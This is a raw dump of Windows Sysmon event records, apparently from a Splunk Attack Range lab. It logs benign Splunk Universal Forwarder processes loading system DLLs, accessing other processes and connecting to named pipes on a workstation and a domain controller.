12:16:08.804{AD5E2759-5432-6143-0500-00000000F101}4122832C:\Windows\system32\csrss.exe{AD5E2759-5B08-618E-03CE-08000000F101}6048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219391Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.804{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B08-618E-03CE-08000000F101}6048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219390Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.790{AD5E2759-5B08-618E-03CE-08000000F101}6048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057344764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.688{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057344763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.688{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057344762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.688{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.672{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057344760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.588{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.588{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC6C68BED5EE2E0BA0FB12D1D6C41F9D,SHA256=2C88DAC0A5CEA4E0CA73716BBB1D45E27890B7D9FC435CF236B18FA30A1A0850falsetrue 734700x800000000000000057344758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057344754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057344752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.510{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.504{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057344747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.504{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057344726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057344724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057344722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057344720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057344719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 